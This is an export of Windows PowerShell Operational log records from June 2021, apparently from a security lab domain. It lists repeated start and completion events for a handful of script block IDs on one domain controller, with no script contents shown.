Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469470
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469469
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469468
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469467
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469466
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469465
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469464
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469463
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469462
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469461
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469460
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469459
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469458
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469457
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469456
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469455
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469454
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469453
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469452
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469451
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469450
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469449
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469448
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469447
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469446
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469445
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469444
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469443
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469442
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469441
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469440
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469439
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469438
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469437
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469436
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469435
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469434
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469433
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469432
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469431
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469430
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469429
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469428
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469427
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469426
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469425
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469424
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469423
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469422
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469421
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469420
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469419
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469418
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469417
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469416
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
